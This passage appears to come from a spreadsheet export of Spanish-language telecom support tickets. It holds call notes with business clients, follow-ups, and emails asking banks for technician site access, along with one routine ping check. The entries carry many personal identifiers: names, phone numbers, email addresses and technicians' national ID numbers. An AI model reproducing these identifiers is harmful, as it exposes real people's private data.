USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 23/06/2022 18:02:22</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE WALTER AGUILAR PERO ENVIA A BUZON.
1001921817
COLA:
NOMBRE: A: 0050379897813
NÚMERO: 0050379897813
DURACIÓN: 0:00:16
ESTADO: CONECTADA
DETALLES: 0050379897813
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 23/06/2022 15:01:20</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE WALTER AGUILAR A QUIEN SE EL INDICO QUE ES NECESARIO QUE LLAME AL PROVEEDOR DE LA PBX YA QUE ESTA CORTANDO LAS LLAMADAS.
INDICA QUE VA A DAR SEGUIMIENTO. SE ESTARA LLAMANDO EN 1HRS.
1001910493
COLA:
NOMBRE: A: 0050379897813
NÚMERO: 0050379897813
DURACIÓN: 0:00:21
ESTADO: CONECTADA
DETALLES: 0050379897813
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 23/06/2022 14:23:57</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE WALTER AGUILAR PERO ENVIA A BUZON.
SE LLAMARA ENSEGUIDA.
1001929065
COLA:
NOMBRE: A: 0050379897813
NÚMERO: 0050379897813
DURACIÓN: 0:00:15
ESTADO: CONECTADA
DETALLES: 0050379897813
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 23/06/2022 15:24:44</t>
  </si>
  <si>
    <t>F4614131</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PARA CORROBORAR TEMA DE HORARIOS PARA LA VISITA TECNICA BERNABE TORRES EL CLIENTE, INDICA QUE LA GESTION DE PERMISOS SE REALICE NOTIFICANDO UN DIA CON ANTICIPACIÓN.
1001952849
COLA:
NOMBRE: A: 40713148
NÚMERO: 40713148
DURACIÓN: 0:03:50
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 40713148
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 23/06/2022 16:49:05</t>
  </si>
  <si>
    <t>SE ÑÑA,A A CÑOEMTE BERNABE TORRES 40713148 PERO NO RESPONDE ENVIA A BUZON
-ID 1001963968 - 1001964398</t>
  </si>
  <si>
    <t>F4614152</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A ELVIN GONZÁLEZ/PR 31543483 PARA CONTINUAR SEGUIMIENTO, INDICA QUE ESTÁ ATENDIENDO A CLIENTE, PIDE SE LE LLAME EN 10/15 MINUTOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ELVIN GONZÁLEZ 31543483 RESPONDE ANA QUIEN APOYA REINICIANDO LOS EQUIPOS PERO EL INCONVENIENTE PERSISTE
-ID 1001968836
NOMBRE DEL CLIENTE: BANCO AZTECA DE GUATEMALA S.A.
UBICACIÓN: 2 CALLE 1-25 ZONA 4 SAN JUAN OSTUNCALCO, QUETZALTENANGO
CONTACTO EN SITIO: ENCARGADO DE TIENDA
HORARIO DE ATENCION:7:30 - 20:00
GESTIÓN DE PERMISOS:DATOS DE PERSONAL TECNICO G7495@ELEKTRA.COM.MX
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELVIN GONZÁLEZ 31543483 MENCIONA QUE SE ENCUENTRA OCUPADO POR LO QUE SOLICITA LLAMADA EN 20 MIN
-ID 10019662768</t>
  </si>
  <si>
    <t>F4614161</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS ##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: VIERNES, 24 DE JUNIO DE 2022 10:13
PARA: CCTELECOMUNICACIONES@GYTCONTINENTAL.COM.GT &lt;CCTELECOMUNICACIONES@GYTCONTINENTAL.COM.GT&gt;; DSICA@GTC.COM.GT &lt;DSICA@GTC.COM.GT&gt;; CCTELECOMUNICACIONES@GTC.COM.GT &lt;CCTELECOMUNICACIONES@GTC.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 7800307T |BANCO G&amp;T CONTINENTAL . |AGENCIA 5 AVENIDA 9-41 ZONA 1
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 7800307T  |BANCO G&amp;T CONTINENTAL .  |AGENCIA 5 AVENIDA 9-41 ZONA 1
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
NOMBRE                                                     IBM                   DPI
IVAN ARRAZOLA                                       951013            2319 45019 0101
EDY ESCALANTE                                       562160            1981 17108 0101
JOSE ANGEL SANDOVAL                          720711           1796 76350 0101
RENE CAMEROS COJON                          532597            2275 16001 0101
HECTOR ROLANDO ALINAN PORON     10629               2360 72870 0208
BYRON CUTZAL                                         535274              1689 67987 0101
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22861738 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001897260</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL 23386801 EXT. | 32320 | 32388 ANDREA  QUIEN TRASLADA LA LLAMADA A LA AGENCIA PERO NO RESPONDEN, ADICIONAL BRINDA CONTACTO DE LA AGENCIA 22861738
-ID 3001895202</t>
  </si>
  <si>
    <t>RE: GESTIÓN DE PERMISOS | 7800307T |BANCO G&amp;T CONTINENTAL . |AGENCIA 5 AVENIDA 9-41 ZONA 1
PARA:VELDIN JANITZIO PALENCIA FLORES;CCTELECOMUNICACIONES@GYTCONTINENTAL.COM.GT;DSICA@GTC.COM.GT;CCTELECOMUNICACIONES@GTC.COM.GT
CC:GRUPO N1;CLIENTESCORPORATIVOS;CNOCCA
MAR 28/06/2022 9:36
ESTIMADO CLIENTE BUEN DÍA,
EN SEGUIMIENTO AL SERVICIO ALARMADO, SOLICITAMOS SU APOYO CON LO SOLICITADO EN EL CORREO QUE ANTECEDE.
EN ESPERA DE SU COMENTARIO PARA PROCEDER CON LA VISITA EL DÍA Y HORA QUE NOS INDIQUEN.</t>
  </si>
  <si>
    <t>F4614163</t>
  </si>
  <si>
    <t>SE ESTÁ VALIDANDO CRONO MÁS RECIENTE EN FALLA CON CLIENTE 00 525551745299, ÉSTE ME DEJA DEMASIADO TIEMPO EN ESPERA; SE CONSULTA A GESTIÓN N1 VÍA SKYPE, SI PROCEDERÁN AL CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 RESPONDE RODRIGO MENCIONA QUE YA OBSERVAN OPERATIVO EL SERVICIO
CLIENTE INDICA QUE SE PUEDE PROCEDER CON EL CIERRE CIERRE
-ID 1001966476</t>
  </si>
  <si>
    <t>F4614201</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS FUNEZ AL 70655316 INDICA QUE AUN NO TIENE INTERNET SOLICITA VISITA TECNICA YA QUE DICE QUE YA CON HOY 4 VECES QUE VA REPORTANDO SOLO UN RATO LEVANTA Y EL MISMO PROBLEMA || SE NOTIFICA A GESTOR **
-ID 1001931707
**</t>
  </si>
  <si>
    <t>F4614220</t>
  </si>
  <si>
    <t>F4614222</t>
  </si>
  <si>
    <t>SE HABLA CON EL CLIENTE PATTY BRAVO A QUIEN SE LE INFORMA QUE EN 1 HORA SE PODRIAN TENER AVANCES.
2001022734
COLA:
NOMBRE: A: 58574812
NÚMERO: 58574812
DURACIÓN: 0:00:09
ESTADO: MARCANDO
DETALLES: 58574812
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 24/06/2022 09:23:45</t>
  </si>
  <si>
    <t>F4614223</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSMAR MANZO 41492115 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001083658</t>
  </si>
  <si>
    <t>F4614229</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LIC. MANUEL SANCHEZ-23795800 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001008189
**</t>
  </si>
  <si>
    <t>SE LLMAA A CLIENTE LIC. MANUEL SANCHEZ-23795800   Y 79059738  ## SE TIENE EN LINEA ## VIVO</t>
  </si>
  <si>
    <t>CLIENTE NO UBICA EQUIPOS ## SE APOYA VIA WHATTSAP###</t>
  </si>
  <si>
    <t>F4614238</t>
  </si>
  <si>
    <t>###SE VALIDA CON ENCARGADO Y ALEJANDRA AJTUN QUE EL ENLACE A NIVEL DE CLARO ESTA BIEN PERO ELLOS REINICIAN EL EQUIPO QUE ESTA DESPUES DEL CPE CISCO PROPORCIONADO POR CLARO POR ESO APARCEN EVENTOS EN LA INTERFAZ  G 0/1 HACIA LA LAN##
ENLACE UP Y SIN PERDIDAS
SE PROCEDE A CIERRE DE TICKET
&lt;QCOAGTCON1C1A03A04EIM1&gt;PING -C 1000 -S 1500 -M 3 -B -VPN-INSTANCE INTERNET_GT_DEPTAL 10.105.45.149
  PING 10.105.45.149: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.105.45.149 PING STATISTICS ---
    985 PACKET(S) TRANSMITTED
    985 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/11 MS</t>
  </si>
  <si>
    <t>F4614253</t>
  </si>
  <si>
    <t>SE HABLÓ CON BYRON GÓMEZ/CLIENTE 59362053 PARA CONSULTAR CÓMO VE SERVICIO, INDICA QUE YA ESTÁ FUERA DE LABORES; PIDE SE LE LLAME MAÑANA A LAS 08:00AM PARA AVANCES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BYRON GÓMEZ - 59362053  CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 2001001969
**</t>
  </si>
  <si>
    <t>F4614267</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PABLO SALAZAR 50198915  - 41595538 NO RESPONDE | ENVIA A BUZON SE INTENTARA LUEGO **
-ID 1001956504 - 1001956630
**</t>
  </si>
  <si>
    <t>F4614272</t>
  </si>
  <si>
    <t>TICKET: F4614272
CLIENTE:MINISTERIO DE EDUCACION										
DIRECCION LA UNION CENTRO DE GOBIERNO AV. GENERAL CABA¥AS  Y 5 CALLE.OTE
ESCALACION
5/5	JUAN RIVAS 	7606-7202	7 HORAS	9:00:00
DIAGNOSTICO
 SIN SEÑAL OPTICA A SALIDA DE ODF SITIO DEL CLIENTE
TIEMPO DE LA WO 5 HORAS@JUAN RIVAS</t>
  </si>
  <si>
    <t>F4614282</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE QUEJ 58616641 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001950695</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 16:54
PARA: EDWIN.BARRIENTOS@INTECAP.EDU.GT &lt;EDWIN.BARRIENTOS@INTECAP.EDU.GT&gt;; VIRGINIA.SAGASTUME@INTECAP.EDU.GT &lt;VIRGINIA.SAGASTUME@INTECAP.EDU.GT&gt;; GERSON.AVILA@INTECAP.EDU.GT &lt;GERSON.AVILA@INTECAP.EDU.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: INSTITUTO TECNICO DE CAPACITACION Y PRODUCTIVIDAD-INTECAP || 826900018T || SD1138149
BUENA TARDE
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE.
PARAMETROS ADECUADOS EN LA FO
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN BARRIENTOS 59861903 MENCIONA QUE YA NO SE ENCUENTRA EN LA OFICINA POR LO QUE SOLICITA SE ENVIEN LAS PRUEBAS POR CORREO
EDWIN.BARRIENTOS@INTECAP.EDU.GT // VIRGINIA.SAGASTUME@INTECAP.EDU.GT // GERSON.AVILA@INTECAP.EDU.GT
-ID 1001951668</t>
  </si>
  <si>
    <t>F4614301</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTINA CLIMAS AL 55448980  CONTESTA LA SEÑORITA MARIELA ORTEGA SOLICITA QUE SE LE LLAME AL 77768114 - 77768181 **
-ID 2001004008
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRSITINA CLIMAS 77768114 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001077756</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTINA CLIMAS AL 77768114 - 77768181 NO RESPONDE AMBOS NUMEROS ENVIAN A BUZON || SE INTENTARA LUEGO **
-ID 2001004769 - 2001005263
**</t>
  </si>
  <si>
    <t>F4614315</t>
  </si>
  <si>
    <t>**SE LLMAMA A CLIENTE  HUGO AGUILAR 50376716078 NO RESPONDE ||  ENVIA A BUZON DE VOZ ||
SE INTENTARA LUEGO **
-ID 1001993715
**</t>
  </si>
  <si>
    <t>ACTUALMENTE EN LLAMADA CON CLIENTE SR. HUGO AGUILAR 50376716078  CONFORME COMENTARIO ANTERIOR SE AGREGA A ING. CHIQUILLO PARA SOLICITAR APOYO, INFORMA QUE LE ENVIEMOS CORREO CON EVIDENCIA Y ESTARA GESTIONANDO INTERNAMENTE UNA INSPECCION, COMENTA QUE SE PUEDE PASAR A DESPACHO TRABAJARLO EN PENDIENTE CLIENTE PARA LA EVALUACION Y REPARACION DEL RACK. CLIENTE ENVIARA EVIDENCIA AL WHATSAPP</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  HUGO AGUILAR AL 50376716078  INDICA QUE ESTA ESTABLE PERO LO QUE REPORTA ES QUE EL LUGAR DONDE ESTA EL EQUIPO ES UNA ESTRUCTURA MUY VIEJA Y QUE ESTA A PUNTO DE CAERSE Y EL QUIERE QUE SE QUITE DE ESE LUGAR ANTES DE QUE SE PUEDA CAER || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 1001998168
**</t>
  </si>
  <si>
    <t>F4614320</t>
  </si>
  <si>
    <t>SE HABLÓ CON AXEL CARRERA/CLIENTE 30742561 (ESTÁ ENFERMO) PIDE SE VEA CON RODRIGO CONTRERAS CLIENTE 31198360, ÉSTE NO CONTESTA; SE DEBE INTENTAR MÁS TARDE HABLAR CON EL SEGUNDO.</t>
  </si>
  <si>
    <t xml:space="preserve"> ** SE LLAMA A CLIENTE RODRIGO CONTRERAS - 31198360 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001993537
**</t>
  </si>
  <si>
    <t>F4614321</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALDANA 40311962 MENCIONA QUE YA SE RETIRARON DE PR POR LO QUE SOLICITA SE DE SEGUIMIENTO MAÑANA A LAS  9:00 HRS
-ID 1001956794</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALDANA 40311962 MENCIONA QUE SALIO DE PR PERO SOLICITA LLAMADA EN 10 MIN
-ID 2001090363</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ALDANA 40311962 MENCIONA QUE AL LLEGARA A PR NO CUENTAN CON ENERGIA POR LO QUE SOLICITA LLAMADA A LAS 14:30
-ID 2001094868</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ALDANA 40311962 MENCIONA QUE LA ENERGIA NO HA RETORNADO POR LO QUE SOLICITA SE DE SEGUIMIENTO EL LUNES A LAS 10:00 HRS
-ID 2001147142</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE  40311962 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001130540</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALDANA 40311962 PERO  SIGUE SIN RESPONDER
-ID 2001135904</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALDANA 40311962 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001046365</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALDANA 40311962 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA LAS  12:30 HRS
-ID 2001055382</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALDANA 40311962 PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 2001019885 - 2001020608</t>
  </si>
  <si>
    <t>F4614335</t>
  </si>
  <si>
    <t>SE ENVIA CORREO DE ACCESO
GSTION DE ACCESOS F4614335 |IP2001138SV | BANCO DAVIVIENDA SALVADORENO S.A. | SANTA TECLAZ. IND. MERLIOTCARRET. A SANTA TECLAKM 9 1/2
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:ELSALVADOR_ITTCASOS@DAVIVIENDA.COM.SV
CC:GRUPO N1;CNOCCA
JUE 23/06/2022 17:37
BUENA TARDE ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA SOLICITAR DE SU AMABLE APOYO CON GESTIONAR APERTURA DE CAJERO A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO,
 F4614335 |IP2001138SV |  BANCO DAVIVIENDA SALVADORENO S.A. | SANTA TECLAZ. IND. MERLIOTCARRET. A SANTA TECLAKM 9 1/2
AGRADECEMOS BRINDAR FECHA Y HORA DE VISITA DE ACUERDO A SU OPERACIÓN PARA PODER REALIZAR COORDINACIÓN
TÉCNICOS:
01320096-0 OSCAR RENE VIDES RAMIREZ
00936126-7 MARIO ERNESTO CRUZ MARQUEZ
02878871-1 JOSE ALFREDO JIMENEZ
00580847-9 CARLOS EDUARDO GOMEZ ZELEDON
04086716-7 GERARDO ANTONIO MINERO FERNANDEZ
02400310-1 EDGAR MAURICIO MONTOYA SANCHEZ
03547221-1 RONAL MOREL CRESPIN
00157708-4 ABRAHAM SAMUEL PEREZ
03245714-4 ADAN ERNESTO GONZALEZ
01968544-3 WALTER ERNESTO RODRIGUEZ PEREZ
01101266-2 JOSE SALVADOR PORTILLO VELASQUEZ
EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 25562880 MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001127170</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREO AUN NO SE TIENE RESPUESTA DEL CLIENTE
ASUNTO: GSTION DE ACCESOS F4614335 |IP2001138SV | BANCO DAVIVIENDA SALVADORENO S.A. | SANTA TECLAZ. IND. MERLIOTCARRET. A SANTA TECLAKM 9 1/2</t>
  </si>
  <si>
    <t>CLIENTE MENCIONA QUE ESTARAN RESPONDIENDO POR CORREO CUANDO YA TENGAN LOS PERMISOS AUTORIZADOS
-ID 2001017939</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 24 DE JUNIO DE 2022 9:12
PARA: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; LUIS A FUENTES &lt;LUIS.A.FUENTES@DAVIVIENDA.COM.SV&gt;; JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; DAVID ALVARENGA &lt;ELSALVADOR_ITTCASOS@DAVIVIENDA.COM.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: GSTION DE ACCESOS F4614335 |IP2001138SV | BANCO DAVIVIENDA SALVADORENO S.A. | SANTA TECLAZ. IND. MERLIOTCARRET. A SANTA TECLAKM 9 1/2
*-*-*-*-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS FUENTES 25562880 MENCIONA QUE NO HA RECIBIDO EL CORREO CLIENTE SOLICITA SE PUEDA COPIAR AL CORREO
ELSALVADOR_ITTCASOS@DAVIVIENDA.COM.SV
-ID 2001017790 - 2001017939</t>
  </si>
  <si>
    <t>F4614347</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS FUENTES AL 2556-2880 NO RESPONDE | ENVIA A BUZON DE VOZ || SE INTENTARA LUEGO , CLIENTE AUN NO RESPONDE CORREO **
-ID 1001993942
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 2556-2880 PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 2001076971</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 24 DE JUNIO DE 2022 11:50
PARA: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; ELSALVADOR_ITTCASOS@DAVIVIVIENDA.COM.SV &lt;ELSALVADOR_ITTCASOS@DAVIVIVIENDA.COM.SV&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
CC: SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: IP2036034/BANCO DAVIVIENDA SALVADORE¥O S.A.
*-*-*-*</t>
  </si>
  <si>
    <t>F4614352</t>
  </si>
  <si>
    <t>SE HABLÓ CON KATHERINE REVOLORIO/CLIENTE 58126359 INDICA QUE SE RETIRA, PERO CONFIRMA QUE DESDE INICIO DE SEMANA HA TENIDO PROBLEMAS CON SERVICIO, PIDE SE LE LLAME MAÑANA A LAS 10:00AM PARA SEGUIMIENTO Y/O REALIZAR PRUEBAS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KATERINE REVOLORIO AL 58126359  INDICA QUE PERSISTE EL INCONVENIENTE QUE SON 3 PERSONAS CONECTADAS VIA WIFI SE LE INDICA QUE ESTA SATURANDO SU ANCHO DE BANDA INDICA QUE LO ESTARA COMENTANDO CON SU JEFE **
-ID 20010060577
**</t>
  </si>
  <si>
    <t>F4614374</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 24 DE JUNIO DE 2022 12:16
PARA: DARWIN HUSSEIN ESPANA NORIEGA &lt;DARWINH.ESPANA@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; RAMON ULLOA (POS HN) &lt;SOPORTE3@POSDEHONDURAS.COM&gt;; VENTAS CORPORATIVAS TGU (POS HN) &lt;CORPORATIVOTGU2@POSDEHONDURAS.COM&gt;; EDWIN HERRERA (POS HN) &lt;E.HERRERA@POSDEHONDURAS.COM&gt;; WAGNER JOSUE POLANCO SANDOVAL &lt;WAGNER.POLANCO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; SERGIO AYALA FIGUEROA &lt;SERGIO.AYALA@CLARO.COM.HN&gt;; SADAM JOSUE ABAS CARRANZA &lt;SADAM.ABAS@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: JONATHAN MARTINEZ (POS HN) &lt;SOPORTE4@POSDEHONDURAS.COM&gt;; DANIEL GUILLEN (POS HN) &lt;VENTASCHOLUTECA@POSDEHONDURAS.COM&gt;; CARLOS SÁNCHEZ(POS HN) &lt;SOPORTE6@POSDEHONDURAS.COM&gt;
ASUNTO: RE: PROBLEMAS DE CONEXION
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4614379</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE ILSE 53900336, CLIENTE INDICA QUE SU SERVICIO ESTÁ DESCONECTADO DESDE AGOSTO DEL AÑO PASADO Y ACTUALMENTE LA LLAMADA COMPLETA PORQUE TIENE UN DESVÍO COLOCADO. INDICA QUE ESTABA DESCONECTADO PORQUE SE IBAN A CAMBIAR DE UBICACIÓN FÍSICA. CLIENTE INDICA QUE SE ENCUENTRA EN EL HOSPITAL Y PARA BRINDAR MAS DETALLES SOLICITA LLAMAR A LUIS FERNANDO AL 54069170 . LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE LUIS SE DA ENTERADO DEL TIEMPO DE MOVILIZACIÓN
2001080288
COLA:
NOMBRE: A: 54069170
NÚMERO: 54069170
DURACIÓN: 0:00:17
ESTADO: CONECTADA
DETALLES: 54069170
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 24/06/2022 12:01:40</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE  LUIS FERNANDO 54069170, INDICA QUE VA DE CAMINO A LAS INSTALACIONES, SOLICITA SE LE LLAME EN 25 MINUTOS. ID: 2001002993</t>
  </si>
  <si>
    <t>SE LLAMA A EJECUTIVA CLAUDIA ARRIOLA 58261256 PARA INFORMARLE DE QUE SE CONCLUYEN CON LOS TRABAJOS DE INSTALACIÓN DE LA LINEA, SE ENLAZA A LA LLAMADA A CLIENTE ILSE A QUIEN SE LE COMENTA LO REALIZADO Y QUEDA ENTERADA QUE UNICAMENTE FALTA QUE CONTACTE A SU PROVEEDOR DE LA PBX PARA CONECTAR SU PLANTA Y RETIRAR EL DESVÍO.
2001204667
COLA:
NOMBRE: A: 58261256
NÚMERO: 58261256
DURACIÓN: 0:05:54
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58261256
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 25/06/2022 08:07:11 A. M.</t>
  </si>
  <si>
    <t>F4614386</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE   EDY RODRIGUEZ 51104913 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001022284</t>
  </si>
  <si>
    <t>F4614469</t>
  </si>
  <si>
